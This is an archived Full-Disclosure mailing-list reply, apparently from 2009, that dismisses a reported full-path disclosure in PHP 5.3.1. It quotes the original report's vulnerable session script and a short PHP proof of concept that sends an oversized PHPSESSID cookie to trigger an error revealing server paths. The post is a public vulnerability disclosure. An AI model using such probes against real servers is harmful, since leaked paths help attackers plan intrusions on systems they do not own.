lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 27 Dec 2009 17:01:59 +1100
From: Jeff Williams <jeffwillis30@...il.com>
To: WHK <www.kernel32@...il.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: Path disclosure in PHP 5.3.1

Oh no a full path !


2009/12/27 WHK <www.kernel32@...il.com>

> Make a script vulnerable:
> <?php
> session_start();
> if($_SESSION)
>  echo $_SESSION;
> else
>  $_SESSION = 'xx';
> ?>
>
> Now look the script in you explorer and change the value of cookie
> "PHPSESSID" to 300 chars "a" and look the disclosure:
> Warning: session_start() [function.session-start]:
> open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php
> on line 3
>
> PoC:
> <?php
> error_reporting(0);
>
> $payload =
> 'GET / HTTP/1.1
> Host: 127.0.0.1
> Connection: close
> Cookie: PHPSESSID='.str_repeat('a', 500).';
>
> ';
>
> if(!$handle = fsockopen('127.0.0.1', 80)){
>  die('Error');
> }else{
>  fputs($handle, $payload);
>  while(!feof($handle)){
>   $retorno .= fread($handle, 1024);
>  }
>  echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
> }
> ?>
>
> if value of cookie is "aaaaaaa" then file in temp of server is
> "sess_aaaaaaa", if value of cookie is ax300 dont make file and return
> the error message.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists